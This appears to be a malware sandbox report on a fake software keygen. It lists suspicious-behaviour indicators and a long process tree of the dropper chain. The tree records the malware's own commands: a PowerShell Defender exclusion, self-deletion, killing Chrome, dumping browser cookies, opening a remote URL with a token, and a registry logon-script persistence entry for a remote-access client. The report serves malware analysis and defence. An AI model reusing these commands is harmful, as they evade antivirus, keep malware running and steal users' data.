pid Process 1988 setups.tmp 1988 setups.tmp 4268 1.exe 4268 1.exe 4268 1.exe 4268 1.exe 4268 1.exe 4268 1.exe 4268 1.exe 4268 1.exe 4268 1.exe -
Suspicious use of AdjustPrivilegeToken 41 IoCs
description pid Process Token: SeDebugPrivilege 2404 Setup.exe Token: SeCreateTokenPrivilege 4636 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 4636 askinstall20.exe Token: SeLockMemoryPrivilege 4636 askinstall20.exe Token: SeIncreaseQuotaPrivilege 4636 askinstall20.exe Token: SeMachineAccountPrivilege 4636 askinstall20.exe Token: SeTcbPrivilege 4636 askinstall20.exe Token: SeSecurityPrivilege 4636 askinstall20.exe Token: SeTakeOwnershipPrivilege 4636 askinstall20.exe Token: SeLoadDriverPrivilege 4636 askinstall20.exe Token: SeSystemProfilePrivilege 4636 askinstall20.exe Token: SeSystemtimePrivilege 4636 askinstall20.exe Token: SeProfSingleProcessPrivilege 4636 askinstall20.exe Token: SeIncBasePriorityPrivilege 4636 askinstall20.exe Token: SeCreatePagefilePrivilege 4636 askinstall20.exe Token: SeCreatePermanentPrivilege 4636 askinstall20.exe Token: SeBackupPrivilege 4636 askinstall20.exe Token: SeRestorePrivilege 4636 askinstall20.exe Token: SeShutdownPrivilege 4636 askinstall20.exe Token: SeDebugPrivilege 4636 askinstall20.exe Token: SeAuditPrivilege 4636 askinstall20.exe Token: SeSystemEnvironmentPrivilege 4636 askinstall20.exe Token: SeChangeNotifyPrivilege 4636 askinstall20.exe Token: SeRemoteShutdownPrivilege 4636 askinstall20.exe Token: SeUndockPrivilege 4636 askinstall20.exe Token: SeSyncAgentPrivilege 4636 askinstall20.exe Token: SeEnableDelegationPrivilege 4636 askinstall20.exe Token: SeManageVolumePrivilege 4636 askinstall20.exe Token: SeImpersonatePrivilege 4636 askinstall20.exe Token: SeCreateGlobalPrivilege 4636 askinstall20.exe Token: 31 4636 askinstall20.exe Token: 32 4636 askinstall20.exe Token: 33 4636 askinstall20.exe Token: 34 4636 askinstall20.exe Token: 35 4636 askinstall20.exe Token: SeDebugPrivilege 4268 multitimer.exe Token: SeDebugPrivilege 4248 taskkill.exe Token: SeDebugPrivilege 416 MicrosoftEdge.exe Token: SeDebugPrivilege 416 MicrosoftEdge.exe Token: SeDebugPrivilege 416 MicrosoftEdge.exe Token: SeDebugPrivilege 416 MicrosoftEdge.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 196 setups.exe 1988 setups.tmp 416 MicrosoftEdge.exe 5000 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 46 IoCs
description pid Process procid_target PID 4776 wrote to memory of 508 4776 Usb_Disk_Formatter_3_2_5_keygen_by_KeygenNinja.exe 78 PID 4776 wrote to memory of 508 4776 Usb_Disk_Formatter_3_2_5_keygen_by_KeygenNinja.exe 78 PID 4776 wrote to memory of 508 4776 Usb_Disk_Formatter_3_2_5_keygen_by_KeygenNinja.exe 78 PID 508 wrote to memory of 1056 508 cmd.exe 81 PID 508 wrote to memory of 1056 508 cmd.exe 81 PID 508 wrote to memory of 1056 508 cmd.exe 81 PID 508 wrote to memory of 1120 508 cmd.exe 82 PID 508 wrote to memory of 1120 508 cmd.exe 82 PID 508 wrote to memory of 1120 508 cmd.exe 82 PID 508 wrote to memory of 1312 508 cmd.exe 83 PID 508 wrote to memory of 1312 508 cmd.exe 83 PID 508 wrote to memory of 1312 508 cmd.exe 83 PID 508 wrote to memory of 4572 508 cmd.exe 84 PID 508 wrote to memory of 4572 508 cmd.exe 84 PID 508 wrote to memory of 4572 508 cmd.exe 84 PID 1056 wrote to memory of 2156 1056 keygen-pr.exe 85 PID 1056 wrote to memory of 2156 1056 keygen-pr.exe 85 PID 1056 wrote to memory of 2156 1056 keygen-pr.exe 85 PID 4572 wrote to memory of 2404 4572 keygen-step-4.exe 86 PID 4572 wrote to memory of 2404 4572 keygen-step-4.exe 86 PID 1312 wrote to memory of 2424 1312 keygen-step-3.exe 87 PID 1312 wrote to memory of 2424 1312 keygen-step-3.exe 87 PID 1312 wrote to memory of 2424 1312 keygen-step-3.exe 87 PID 2156 wrote to memory of 3868 2156 key.exe 89 PID 2156 wrote to memory of 3868 2156 key.exe 89 PID 2156 wrote to memory of 3868 2156 key.exe 89 PID 2424 wrote to memory of 4676 2424 cmd.exe 90 PID 2424 wrote to memory of 4676 2424 cmd.exe 90 PID 2424 wrote to memory of 4676 2424 cmd.exe 90 PID 2404 wrote to memory of 4268 2404 Setup.exe 91 PID 2404 wrote to memory of 4268 2404 Setup.exe 91 PID 2404 wrote to memory of 196 2404 Setup.exe 92 PID 2404 wrote to memory of 196 2404 Setup.exe 92 PID 2404 wrote to memory of 196 2404 Setup.exe 92 PID 4572 wrote to memory of 4636 4572 keygen-step-4.exe 93 PID 4572 wrote to memory of 4636 4572 keygen-step-4.exe 93 PID 4572 wrote to memory of 4636 4572 keygen-step-4.exe 93 PID 196 wrote to memory of 1988 196 setups.exe 94 PID 196 wrote to memory of 1988 196 setups.exe 94 PID 196 wrote to memory of 1988 196 setups.exe 94 PID 4636 wrote to memory of 5032 4636 askinstall20.exe 96 PID 4636 wrote to memory of 5032 4636 askinstall20.exe 96 PID 4636 wrote to memory of 5032 4636 askinstall20.exe 96 PID 5032 wrote to memory of 4248 5032 cmd.exe 98 PID 5032 wrote to memory of 4248 5032 cmd.exe 98 PID 5032 wrote to memory of 4248 5032 cmd.exe 98
Processes
-
C:\Users\Admin\AppData\Local\Temp\Usb_Disk_Formatter_3_2_5_keygen_by_KeygenNinja.exe"C:\Users\Admin\AppData\Local\Temp\Usb_Disk_Formatter_3_2_5_keygen_by_KeygenNinja.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4776 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:508 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:3868
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:1120
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:4676
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4572 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2404 -
C:\Users\Admin\AppData\Local\Temp\NB8SOF92YI\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\NB8SOF92YI\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4268 -
C:\Users\Admin\AppData\Local\Temp\NB8SOF92YI\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\NB8SOF92YI\multitimer.exe" 1 3.1617536602.6069a65a8cc8f 1016⤵PID:1780
-
C:\Users\Admin\AppData\Local\Temp\NB8SOF92YI\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\NB8SOF92YI\multitimer.exe" 2 3.1617536602.6069a65a8cc8f7⤵PID:1996
-
C:\Users\Admin\AppData\Local\Temp\kt5k1hcz53k\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\kt5k1hcz53k\Setup3310.exe" /Verysilent /subid=5778⤵PID:1780
-
C:\Users\Admin\AppData\Local\Temp\is-6JB8M.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-6JB8M.tmp\Setup3310.tmp" /SL5="$40300,138429,56832,C:\Users\Admin\AppData\Local\Temp\kt5k1hcz53k\Setup3310.exe" /Verysilent /subid=5779⤵PID:428
-
C:\Users\Admin\AppData\Local\Temp\is-OL95P.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-OL95P.tmp\Setup.exe" /Verysilent10⤵PID:3236
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"11⤵PID:1768
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:5680
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:4600
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"11⤵PID:1064
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1064 -s 94812⤵
- Program crash
PID:10180
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1064 -s 100412⤵
- Program crash
PID:10608
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1064 -s 101212⤵
- Program crash
PID:10896
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1064 -s 112012⤵
- Program crash
PID:6896
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1064 -s 116812⤵
- Program crash
PID:7464
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1064 -s 120812⤵
- Program crash
PID:6636
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1064 -s 151212⤵
- Program crash
PID:4388
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1064 -s 155612⤵
- Program crash
PID:9404
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1064 -s 160012⤵
- Program crash
PID:6304
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"11⤵PID:4464
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"11⤵PID:5904
-
C:\Users\Admin\AppData\Local\Temp\is-EVVH4.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-EVVH4.tmp\LabPicV3.tmp" /SL5="$203A6,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"12⤵PID:4780
-
C:\Users\Admin\AppData\Local\Temp\is-D4A12.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-D4A12.tmp\ppppppfy.exe" /S /UID=lab21413⤵PID:4452
-
C:\Program Files\Windows NT\MWZQTXFWVH\prolab.exe"C:\Program Files\Windows NT\MWZQTXFWVH\prolab.exe" /VERYSILENT14⤵PID:5372
-
C:\Users\Admin\AppData\Local\Temp\is-UGODE.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-UGODE.tmp\prolab.tmp" /SL5="$603E6,575243,216576,C:\Program Files\Windows NT\MWZQTXFWVH\prolab.exe" /VERYSILENT15⤵PID:4924
-
-
-
C:\Users\Admin\AppData\Local\Temp\06-6c999-8d4-c909e-36c074b2a602d\Johyjaevica.exe"C:\Users\Admin\AppData\Local\Temp\06-6c999-8d4-c909e-36c074b2a602d\Johyjaevica.exe"14⤵PID:788
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 122015⤵PID:11236
-
-
-
C:\Users\Admin\AppData\Local\Temp\6b-f9b2d-489-4fbbf-c535f4e0bb922\Bizhunyzhosae.exe"C:\Users\Admin\AppData\Local\Temp\6b-f9b2d-489-4fbbf-c535f4e0bb922\Bizhunyzhosae.exe"14⤵PID:1020
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pt1duxns.y5s\md6_6ydj.exe & exit15⤵PID:6224
-
C:\Users\Admin\AppData\Local\Temp\pt1duxns.y5s\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\pt1duxns.y5s\md6_6ydj.exe16⤵PID:6492
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pdq2twgg.geo\askinstall31.exe & exit15⤵PID:6580
-
C:\Users\Admin\AppData\Local\Temp\pdq2twgg.geo\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\pdq2twgg.geo\askinstall31.exe16⤵PID:7596
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe17⤵PID:8228
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe18⤵
- Kills process with taskkill
PID:10564
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\h54agxp2.mig\toolspab1.exe & exit15⤵PID:6948
-
C:\Users\Admin\AppData\Local\Temp\h54agxp2.mig\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\h54agxp2.mig\toolspab1.exe16⤵PID:9896
-
C:\Users\Admin\AppData\Local\Temp\h54agxp2.mig\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\h54agxp2.mig\toolspab1.exe17⤵PID:10976
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jrtp1py4.34l\GcleanerWW.exe /mixone & exit15⤵PID:9164
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"11⤵PID:5884
-
C:\Users\Admin\AppData\Local\Temp\is-NFO3A.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-NFO3A.tmp\lylal220.tmp" /SL5="$20406,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"12⤵PID:5872
-
C:\Users\Admin\AppData\Local\Temp\is-J53II.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-J53II.tmp\Microsoft.exe" /S /UID=lylal22013⤵PID:3364
-
C:\Program Files\Windows Security\FRQGKVATYX\irecord.exe"C:\Program Files\Windows Security\FRQGKVATYX\irecord.exe" /VERYSILENT14⤵PID:1900
-
C:\Users\Admin\AppData\Local\Temp\is-8D42C.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-8D42C.tmp\irecord.tmp" /SL5="$30530,6265333,408064,C:\Program Files\Windows Security\FRQGKVATYX\irecord.exe" /VERYSILENT15⤵PID:4560
-
-
-
C:\Users\Admin\AppData\Local\Temp\fa-2610d-777-ebbbf-1c70e997bbb8c\Xuzhaepulaesi.exe"C:\Users\Admin\AppData\Local\Temp\fa-2610d-777-ebbbf-1c70e997bbb8c\Xuzhaepulaesi.exe"14⤵PID:3016
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 234015⤵PID:11032
-
-
-
C:\Users\Admin\AppData\Local\Temp\e9-71ea0-a8f-3ae9c-2b4db12e99bbe\Gekuhejeru.exe"C:\Users\Admin\AppData\Local\Temp\e9-71ea0-a8f-3ae9c-2b4db12e99bbe\Gekuhejeru.exe"14⤵PID:1536
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2nrfwiyt.uqu\md6_6ydj.exe & exit15⤵PID:7724
-
C:\Users\Admin\AppData\Local\Temp\2nrfwiyt.uqu\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\2nrfwiyt.uqu\md6_6ydj.exe16⤵PID:3568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2zyw05o5.dyl\askinstall31.exe & exit15⤵PID:8196
-
C:\Users\Admin\AppData\Local\Temp\2zyw05o5.dyl\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\2zyw05o5.dyl\askinstall31.exe16⤵PID:2588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xx0et3mn.32h\toolspab1.exe & exit15⤵PID:8836
-
C:\Users\Admin\AppData\Local\Temp\xx0et3mn.32h\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\xx0et3mn.32h\toolspab1.exe16⤵PID:9840
-
C:\Users\Admin\AppData\Local\Temp\xx0et3mn.32h\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\xx0et3mn.32h\toolspab1.exe17⤵PID:10372
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\egstfwvd.ikc\GcleanerWW.exe /mixone & exit15⤵PID:9872
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"11⤵PID:1540
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"12⤵PID:1012
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install13⤵PID:720
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"11⤵PID:5192
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"12⤵PID:5636
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install13⤵PID:2408
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"11⤵PID:3612
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"11⤵PID:2100
-
C:\Users\Admin\AppData\Local\Temp\K2CA06U27E\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\K2CA06U27E\multitimer.exe" 0 306065bb10421b26.04333812 0 10312⤵PID:5800
-
C:\Users\Admin\AppData\Local\Temp\K2CA06U27E\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\K2CA06U27E\multitimer.exe" 1 3.1617536701.6069a6bddbccf 10313⤵PID:5796
-
C:\Users\Admin\AppData\Local\Temp\K2CA06U27E\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\K2CA06U27E\multitimer.exe" 2 3.1617536701.6069a6bddbccf14⤵PID:6200
-
C:\Users\Admin\AppData\Local\Temp\2jhdu5ommud\app.exe"C:\Users\Admin\AppData\Local\Temp\2jhdu5ommud\app.exe" /8-2315⤵PID:8296
-
-
C:\Users\Admin\AppData\Local\Temp\fh3zxsygxbq\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\fh3zxsygxbq\cpyrix.exe" /VERYSILENT15⤵PID:8288
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe16⤵PID:5112
-
C:\Users\Admin\AppData\Local\Temp\3aefe0fa-a193-44c5-a34f-6120c7073a63\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\3aefe0fa-a193-44c5-a34f-6120c7073a63\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\3aefe0fa-a193-44c5-a34f-6120c7073a63\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run17⤵PID:9636
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\3aefe0fa-a193-44c5-a34f-6120c7073a63\test.bat"18⤵PID:10928
-
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe16⤵PID:6988
-
-
-
C:\Users\Admin\AppData\Local\Temp\1dwz5dymrun\vict.exe"C:\Users\Admin\AppData\Local\Temp\1dwz5dymrun\vict.exe" /VERYSILENT /id=53515⤵PID:8352
-
C:\Users\Admin\AppData\Local\Temp\is-MKNA3.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-MKNA3.tmp\vict.tmp" /SL5="$3036A,870426,780800,C:\Users\Admin\AppData\Local\Temp\1dwz5dymrun\vict.exe" /VERYSILENT /id=53516⤵PID:8528
-
C:\Users\Admin\AppData\Local\Temp\is-S2M80.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-S2M80.tmp\win1host.exe" 53517⤵PID:7360
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3sjugkvlp2b\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\3sjugkvlp2b\Setup3310.exe" /Verysilent /subid=57715⤵PID:8420
-
C:\Users\Admin\AppData\Local\Temp\is-D5U2D.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-D5U2D.tmp\Setup3310.tmp" /SL5="$30308,138429,56832,C:\Users\Admin\AppData\Local\Temp\3sjugkvlp2b\Setup3310.exe" /Verysilent /subid=57716⤵PID:10732
-
C:\Users\Admin\AppData\Local\Temp\is-0097G.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-0097G.tmp\Setup.exe" /Verysilent17⤵PID:8844
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ggenzisflrr\vpn.exe"C:\Users\Admin\AppData\Local\Temp\ggenzisflrr\vpn.exe" /silent /subid=48215⤵PID:9180
-
C:\Users\Admin\AppData\Local\Temp\is-0M4AG.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-0M4AG.tmp\vpn.tmp" /SL5="$30246,15170975,270336,C:\Users\Admin\AppData\Local\Temp\ggenzisflrr\vpn.exe" /silent /subid=48216⤵PID:9400
-
-
-
C:\Users\Admin\AppData\Local\Temp\uup4af33qmz\5xwiyxdm52d.exe"C:\Users\Admin\AppData\Local\Temp\uup4af33qmz\5xwiyxdm52d.exe" /ustwo INSTALL15⤵PID:9380
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\AZ9GXW95YT\setups.exe"C:\Users\Admin\AppData\Local\Temp\AZ9GXW95YT\setups.exe" ll12⤵PID:5212
-
C:\Users\Admin\AppData\Local\Temp\is-BKAMF.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-BKAMF.tmp\setups.tmp" /SL5="$402F6,454998,229376,C:\Users\Admin\AppData\Local\Temp\AZ9GXW95YT\setups.exe" ll13⤵PID:5244
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\f49msXwaGcZo.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\f49msXwaGcZo.exe"11⤵PID:4048
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:3960
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ezbxn5kjx4l\app.exe"C:\Users\Admin\AppData\Local\Temp\ezbxn5kjx4l\app.exe" /8-238⤵PID:4076
-
C:\Users\Admin\AppData\Local\Temp\ezbxn5kjx4l\app.exe"C:\Users\Admin\AppData\Local\Temp\ezbxn5kjx4l\app.exe" /8-239⤵PID:7664
-
-
-
C:\Users\Admin\AppData\Local\Temp\ueyo1nbikxb\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\ueyo1nbikxb\cpyrix.exe" /VERYSILENT8⤵PID:4700
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe9⤵PID:5652
-
C:\Users\Admin\AppData\Local\Temp\09beca96-d1aa-4000-95c5-458ff5db9a2a\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\09beca96-d1aa-4000-95c5-458ff5db9a2a\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\09beca96-d1aa-4000-95c5-458ff5db9a2a\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run10⤵PID:4148
-
C:\Users\Admin\AppData\Local\Temp\09beca96-d1aa-4000-95c5-458ff5db9a2a\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\09beca96-d1aa-4000-95c5-458ff5db9a2a\AdvancedRun.exe" /SpecialRun 4101d8 414811⤵PID:5780
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force10⤵PID:6036
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 110⤵PID:3532
-
C:\Windows\SysWOW64\timeout.exetimeout 111⤵
- Delays execution with timeout.exe
PID:4896
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"10⤵
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4268
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5652 -s 142810⤵
- Program crash
PID:6128
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe9⤵PID:5188
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"10⤵PID:2952
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5icmb2k0qm2\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\5icmb2k0qm2\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:5224
-
C:\Users\Admin\AppData\Local\Temp\is-PCG83.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-PCG83.tmp\IBInstaller_97039.tmp" /SL5="$2031E,14574507,721408,C:\Users\Admin\AppData\Local\Temp\5icmb2k0qm2\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵PID:5340
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-TVJLU.tmp\{app}\microsoft.cab -F:* %ProgramData%10⤵PID:5660
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-TVJLU.tmp\{app}\microsoft.cab -F:* C:\ProgramData11⤵PID:5756
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039^¶m=10⤵PID:6332
-
-
C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"10⤵PID:5956
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\client32.exe" /f10⤵PID:5040
-
-
-
-
